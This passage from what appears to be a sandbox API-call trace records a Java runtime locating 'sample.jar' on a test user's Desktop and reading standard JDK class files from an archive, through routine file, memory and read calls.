ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f603a08, cFileName="Users", cAlternateFileName="")) returned 0x425d20 [0100.402] FindClose (in: hFindFile=0x425d20 | out: hFindFile=0x425d20) returned 1 [0100.402] wcslen (_String="Users") returned 0x5 [0100.402] wcslen (_String="C:\\Users\\RDHJ0C~1") returned 0x11 [0100.402] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1", lpFindFileData=0x208d280 | out: lpFindFileData=0x208d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xc7f89674, ftLastAccessTime.dwHighDateTime=0x1d789c1, ftLastWriteTime.dwLowDateTime=0xc7f89674, ftLastWriteTime.dwHighDateTime=0x1d789c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f603a08, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x426200 [0100.402] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0100.402] wcslen (_String="RDhJ0CNFevzX") returned 0xc [0100.402] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop") returned 0x19 [0100.402] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\Desktop", lpFindFileData=0x208d280 | out: lpFindFileData=0x208d280*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4c24231, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x4c24231, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6f603a08, cFileName="Desktop", cAlternateFileName="")) returned 0x4264a0 [0100.402] FindClose (in: hFindFile=0x4264a0 | out: hFindFile=0x4264a0) returned 1 [0100.402] wcslen (_String="Desktop") returned 0x7 [0100.403] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0100.403] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar", lpFindFileData=0x208d280 | out: lpFindFileData=0x208d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820, dwReserved0=0x0, dwReserved1=0x6f603a08, cFileName="sample.jar", cAlternateFileName="")) returned 0x425fc0 [0100.403] FindClose (in: hFindFile=0x425fc0 | out: hFindFile=0x425fc0) returned 1 [0100.403] wcslen (_String="sample.jar") returned 0xa [0100.403] free (_Block=0x122292e0) [0100.403] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0100.404] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0100.404] malloc (_Size=0x5c) returned 0x1220f800 [0100.404] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0100.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208dcb8, lpFilePart=0x208dcb0 | out: lpBuffer="", lpFilePart=0x208dcb0*=0x0) returned 0x29 [0100.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208da50 | out: lpFileInformation=0x208da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0100.405] free (_Block=0x1220f800) [0100.405] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0100.405] malloc (_Size=0x5c) returned 0x1220f640 [0100.405] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0100.405] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208dcb8, lpFilePart=0x208dcb0 | out: lpBuffer="", lpFilePart=0x208dcb0*=0x0) returned 0x29 [0100.405] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208da50 | out: lpFileInformation=0x208da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0100.406] free (_Block=0x1220f640) [0100.407] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0100.407] malloc (_Size=0x5c) returned 0x1220f8e0 [0100.407] wcscpy (in: _Dest=0x1220f8e0, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0100.407] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208dd98, lpFilePart=0x208dd90 | out: lpBuffer="", lpFilePart=0x208dd90*=0x0) returned 0x29 [0100.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db30 | out: lpFileInformation=0x208db30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0100.408] free (_Block=0x1220f8e0) [0100.410] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0100.414] strlen (_Str="java/lang/SystemClassLoaderAction.class") returned 0x27 [0100.414] malloc (_Size=0x48) returned 0x121d9710 [0100.415] malloc (_Size=0xa0) returned 0x122292e0 [0100.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419ab8, lpNewFilePointer=0x208e650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e650*=54631096) returned 1 [0100.415] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e620, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208e620*=0xa0, lpOverlapped=0x0) returned 1 [0100.416] malloc (_Size=0x28) returned 0x121d7af0 [0100.416] free (_Block=0x122292e0) [0100.416] strlen (_Str="java/lang/SystemClassLoaderAction.class") returned 0x27 [0100.416] strcpy (in: _Dest=0x208e7d0, _Source="java/lang/SystemClassLoaderAction.class" | out: _Dest="java/lang/SystemClassLoaderAction.class") returned="java/lang/SystemClassLoaderAction.class" [0100.416] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31350d1, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=51597521) returned 1 [0100.416] ReadFile (in: hFile=0x134, lpBuffer=0x208e2a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x208e2a0*, lpNumberOfBytesRead=0x208e220*=0x1e, lpOverlapped=0x0) returned 1 [0100.417] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3135116, lpNewFilePointer=0x208e2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2b0*=51597590) returned 1 [0100.417] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4d0, lpNumberOfBytesRead=0x208e280, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e280*=0x4d0, lpOverlapped=0x0) returned 1 [0100.418] free (_Block=0x121da3f0) [0100.418] free (_Block=0x121d9850) [0100.520] strlen (_Str="java/lang/invoke/MethodHandleImpl.class") returned 0x27 [0100.520] malloc (_Size=0x48) returned 0x121d95d0 [0100.520] malloc (_Size=0xa0) returned 0x12225f10 [0100.520] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419a63, lpNewFilePointer=0x208e330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e330*=54631011) returned 1 [0100.521] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e300, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208e300*=0xa0, lpOverlapped=0x0) returned 1 [0100.524] malloc (_Size=0x28) returned 0x12221c00 [0100.525] free (_Block=0x12225f10) [0100.525] strlen (_Str="java/lang/invoke/MethodHandleImpl.class") returned 0x27 [0100.526] strcpy (in: _Dest=0x208e4b0, _Source="java/lang/invoke/MethodHandleImpl.class" | out: _Dest="java/lang/invoke/MethodHandleImpl.class") returned="java/lang/invoke/MethodHandleImpl.class" [0100.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312d6b5, lpNewFilePointer=0x208df30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df30*=51566261) returned 1 [0100.526] ReadFile (in: hFile=0x134, lpBuffer=0x208df80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df00, lpOverlapped=0x0 | out: lpBuffer=0x208df80*, lpNumberOfBytesRead=0x208df00*=0x1e, lpOverlapped=0x0) returned 1 [0100.532] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312d6fa, lpNewFilePointer=0x208df90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df90*=51566330) returned 1 [0100.532] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x79d7, lpNumberOfBytesRead=0x208df60, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208df60*=0x79d7, lpOverlapped=0x0) returned 1 [0100.540] free (_Block=0x121d7af0) [0100.540] free (_Block=0x121d9710) [0100.574] malloc (_Size=0x48) returned 0x1228ef00 [0100.574] malloc (_Size=0xa0) returned 0x12225f10 [0100.574] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419a0c, lpNewFilePointer=0x208dca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dca0*=54630924) returned 1 [0100.574] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc70, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dc70*=0xa0, lpOverlapped=0x0) returned 1 [0100.581] malloc (_Size=0x2a) returned 0x12220fe0 [0100.582] free (_Block=0x12225f10) [0100.582] strlen (_Str="java/lang/invoke/MethodHandleImpl$1.class") returned 0x29 [0100.582] strcpy (in: _Dest=0x208de20, _Source="java/lang/invoke/MethodHandleImpl$1.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$1.class") returned="java/lang/invoke/MethodHandleImpl$1.class" [0100.582] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312d2e5, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51565285) returned 1 [0100.582] ReadFile (in: hFile=0x134, lpBuffer=0x208d8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x208d8f0*, lpNumberOfBytesRead=0x208d870*=0x1e, lpOverlapped=0x0) returned 1 [0100.583] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312d32c, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=51565356) returned 1 [0100.583] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x389, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d8d0*=0x389, lpOverlapped=0x0) returned 1 [0100.584] free (_Block=0x12221c00) [0100.584] free (_Block=0x121d95d0) [0100.596] strlen (_Str="java/lang/invoke/MethodHandleImpl$2.class") returned 0x29 [0100.596] malloc (_Size=0x48) returned 0x1228ed70 [0100.596] malloc (_Size=0xa0) returned 0x12225f10 [0100.596] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34199b5, lpNewFilePointer=0x208dca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dca0*=54630837) returned 1 [0100.596] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc70, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dc70*=0xa0, lpOverlapped=0x0) returned 1 [0100.598] malloc (_Size=0x2a) returned 0x122218a0 [0100.598] free (_Block=0x12225f10) [0100.598] strlen (_Str="java/lang/invoke/MethodHandleImpl$2.class") returned 0x29 [0100.599] strcpy (in: _Dest=0x208de20, _Source="java/lang/invoke/MethodHandleImpl$2.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$2.class") returned="java/lang/invoke/MethodHandleImpl$2.class" [0100.599] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312cdce, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51563982) returned 1 [0100.599] ReadFile (in: hFile=0x134, lpBuffer=0x208d8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x208d8f0*, lpNumberOfBytesRead=0x208d870*=0x1e, lpOverlapped=0x0) returned 1 [0100.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312ce15, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=51564053) returned 1 [0100.603] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x4d0, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d8d0*=0x4d0, lpOverlapped=0x0) returned 1 [0100.603] free (_Block=0x12220fe0) [0100.604] free (_Block=0x1228ef00) [0100.605] strlen (_Str="java/util/function/Function.class") returned 0x21 [0100.605] malloc (_Size=0x48) returned 0x1228e410 [0100.605] malloc (_Size=0xa0) returned 0x12225f10 [0100.606] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419966, lpNewFilePointer=0x208d1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1e0*=54630758) returned 1 [0100.606] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1b0, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208d1b0*=0xa0, lpOverlapped=0x0) returned 1 [0100.607] malloc (_Size=0x22) returned 0x12221ab0 [0100.607] free (_Block=0x12225f10) [0100.608] strlen (_Str="java/util/function/Function.class") returned 0x21 [0100.608] strcpy (in: _Dest=0x208d360, _Source="java/util/function/Function.class" | out: _Dest="java/util/function/Function.class") returned="java/util/function/Function.class" [0100.608] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312c6af, lpNewFilePointer=0x208cde0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cde0*=51562159) returned 1 [0100.608] ReadFile (in: hFile=0x134, lpBuffer=0x208ce30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cdb0, lpOverlapped=0x0 | out: lpBuffer=0x208ce30*, lpNumberOfBytesRead=0x208cdb0*=0x1e, lpOverlapped=0x0) returned 1 [0100.609] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312c6ee, lpNewFilePointer=0x208ce40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce40*=51562222) returned 1 [0100.609] ReadFile (in: hFile=0x134, lpBuffer=0x122767a0, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x208ce10, lpOverlapped=0x0 | out: lpBuffer=0x122767a0*, lpNumberOfBytesRead=0x208ce10*=0x6e0, lpOverlapped=0x0) returned 1 [0100.610] free (_Block=0x122218a0) [0100.610] free (_Block=0x1228ed70) [0100.623] strlen (_Str="java/lang/invoke/MethodHandleImpl$3.class") returned 0x29 [0100.623] malloc (_Size=0x48) returned 0x1228e190 [0100.623] malloc (_Size=0xa0) returned 0x12225f10 [0100.623] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341990f, lpNewFilePointer=0x208dca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dca0*=54630671) returned 1 [0100.623] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc70, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dc70*=0xa0, lpOverlapped=0x0) returned 1 [0100.625] malloc (_Size=0x2a) returned 0x12221160 [0100.625] free (_Block=0x12225f10) [0100.625] strlen (_Str="java/lang/invoke/MethodHandleImpl$3.class") returned 0x29 [0100.626] strcpy (in: _Dest=0x208de20, _Source="java/lang/invoke/MethodHandleImpl$3.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$3.class") returned="java/lang/invoke/MethodHandleImpl$3.class" [0100.626] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312c268, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51561064) returned 1 [0100.626] ReadFile (in: hFile=0x134, lpBuffer=0x208d8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x208d8f0*, lpNumberOfBytesRead=0x208d870*=0x1e, lpOverlapped=0x0) returned 1 [0100.627] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312c2af, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=51561135) returned 1 [0100.627] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d8d0*=0x400, lpOverlapped=0x0) returned 1 [0100.627] free (_Block=0x12221ab0) [0100.628] free (_Block=0x1228e410) [0100.633] strlen (_Str="java/lang/invoke/MethodHandleImpl$4.class") returned 0x29 [0100.634] malloc (_Size=0x48) returned 0x1228e370 [0100.634] malloc (_Size=0xa0) returned 0x12225f10 [0100.634] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34198b8, lpNewFilePointer=0x208dca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dca0*=54630584) returned 1 [0100.634] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc70, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dc70*=0xa0, lpOverlapped=0x0) returned 1 [0100.635] malloc (_Size=0x2a) returned 0x12220ce0 [0100.635] free (_Block=0x12225f10) [0100.635] strlen (_Str="java/lang/invoke/MethodHandleImpl$4.class") returned 0x29 [0100.635] strcpy (in: _Dest=0x208de20, _Source="java/lang/invoke/MethodHandleImpl$4.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$4.class") returned="java/lang/invoke/MethodHandleImpl$4.class" [0100.635] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312bfba, lpNewFilePointer=0x208d8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8a0*=51560378) returned 1 [0100.635] ReadFile (in: hFile=0x134, lpBuffer=0x208d8f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d870, lpOverlapped=0x0 | out: lpBuffer=0x208d8f0*, lpNumberOfBytesRead=0x208d870*=0x1e, lpOverlapped=0x0) returned 1 [0100.637] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312c001, lpNewFilePointer=0x208d900, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d900*=51560449) returned 1 [0100.637] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x267, lpNumberOfBytesRead=0x208d8d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d8d0*=0x267, lpOverlapped=0x0) returned 1 [0100.638] free (_Block=0x12221160) [0100.638] free (_Block=0x1228e190) [0100.640] strlen (_Str="java/lang/ClassValue.class") returned 0x1a [0100.640] malloc (_Size=0x48) returned 0x1228e960 [0100.640] malloc (_Size=0xa0) returned 0x12225f10 [0100.640] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419870, lpNewFilePointer=0x208d260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d260*=54630512) returned 1 [0100.640] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d230, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208d230*=0xa0, lpOverlapped=0x0) returned 1 [0100.641] malloc (_Size=0x1b) returned 0x12221e70 [0100.642] free (_Block=0x12225f10) [0100.642] strlen (_Str="java/lang/ClassValue.class") returned 0x1a [0100.642] strcpy (in: _Dest=0x208d3e0, _Source="java/lang/ClassValue.class" | out: _Dest="java/lang/ClassValue.class") returned="java/lang/ClassValue.class" [0100.642] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312af66, lpNewFilePointer=0x208ce60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce60*=51556198) returned 1 [0100.642] ReadFile (in: hFile=0x134, lpBuffer=0x208ceb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce30, lpOverlapped=0x0 | out: lpBuffer=0x208ceb0*, lpNumberOfBytesRead=0x208ce30*=0x1e, lpOverlapped=0x0) returned 1 [0100.644] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312af9e, lpNewFilePointer=0x208cec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cec0*=51556254) returned 1 [0100.644] ReadFile (in: hFile=0x134, lpBuffer=0x12276530, nNumberOfBytesToRead=0x101c, lpNumberOfBytesRead=0x208ce90, lpOverlapped=0x0 | out: lpBuffer=0x12276530*, lpNumberOfBytesRead=0x208ce90*=0x101c, lpOverlapped=0x0) returned 1 [0100.644] free (_Block=0x12220ce0) [0100.644] free (_Block=0x1228e370) [0100.649] malloc (_Size=0x48) returned 0x1228ecd0 [0100.649] malloc (_Size=0xa0) returned 0x12225f10 [0100.649] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419822, lpNewFilePointer=0x208d520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d520*=54630434) returned 1 [0100.649] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4f0, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208d4f0*=0xa0, lpOverlapped=0x0) returned 1 [0100.650] malloc (_Size=0x21) returned 0x12222080 [0100.651] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a7b3, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=51554227) returned 1 [0100.651] ReadFile (in: hFile=0x134, lpBuffer=0x208d170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x208d170*, lpNumberOfBytesRead=0x208d0f0*=0x1e, lpOverlapped=0x0) returned 1 [0100.651] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a7f1, lpNewFilePointer=0x208d180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d180*=51554289) returned 1 [0100.651] ReadFile (in: hFile=0x134, lpBuffer=0x12263960, nNumberOfBytesToRead=0x775, lpNumberOfBytesRead=0x208d150, lpOverlapped=0x0 | out: lpBuffer=0x12263960*, lpNumberOfBytesRead=0x208d150*=0x775, lpOverlapped=0x0) returned 1 [0100.653] strlen (_Str="java/lang/ClassValue$Identity.class") returned 0x23 [0100.653] malloc (_Size=0x48) returned 0x1228eb90 [0100.653] malloc (_Size=0xa0) returned 0x12225f10 [0100.653] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34197d1, lpNewFilePointer=0x208dbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbe0*=54630353) returned 1 [0100.653] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbb0, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dbb0*=0xa0, lpOverlapped=0x0) returned 1 [0100.654] malloc (_Size=0x24) returned 0x12222170 [0100.655] free (_Block=0x12225f10) [0100.655] strlen (_Str="java/lang/ClassValue$Identity.class") returned 0x23 [0100.655] strcpy (in: _Dest=0x208dd60, _Source="java/lang/ClassValue$Identity.class" | out: _Dest="java/lang/ClassValue$Identity.class") returned="java/lang/ClassValue$Identity.class" [0100.655] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a69e, lpNewFilePointer=0x208d7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7e0*=51553950) returned 1 [0100.655] ReadFile (in: hFile=0x134, lpBuffer=0x208d830, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7b0, lpOverlapped=0x0 | out: lpBuffer=0x208d830*, lpNumberOfBytesRead=0x208d7b0*=0x1e, lpOverlapped=0x0) returned 1 [0100.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a6df, lpNewFilePointer=0x208d840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d840*=51554015) returned 1 [0100.656] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x208d810, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208d810*=0xd4, lpOverlapped=0x0) returned 1 [0100.657] free (_Block=0x12222080) [0100.657] free (_Block=0x1228ecd0) [0100.663] strlen (_Str="java/lang/ClassValue$Version.class") returned 0x22 [0100.663] malloc (_Size=0x48) returned 0x1228eb40 [0100.664] malloc (_Size=0xa0) returned 0x12225f10 [0100.664] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419781, lpNewFilePointer=0x208dbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbe0*=54630273) returned 1 [0100.664] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbb0, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dbb0*=0xa0, lpOverlapped=0x0) returned 1 [0100.671] malloc (_Size=0x23) returned 0x12221ff0 [0100.672] free (_Block=0x12225f10) [0100.672] strlen (_Str="java/lang/ClassValue$Version.class") returned 0x22 [0100.672] strcpy (in: _Dest=0x208dd60, _Source="java/lang/ClassValue$Version.class" | out: _Dest="java/lang/ClassValue$Version.class") returned="java/lang/ClassValue$Version.class" [0100.672] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a278, lpNewFilePointer=0x208d7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7e0*=51552888) returned 1 [0100.672] ReadFile (in: hFile=0x134, lpBuffer=0x208d830, nNumberOfBytesToRead=0x1e, 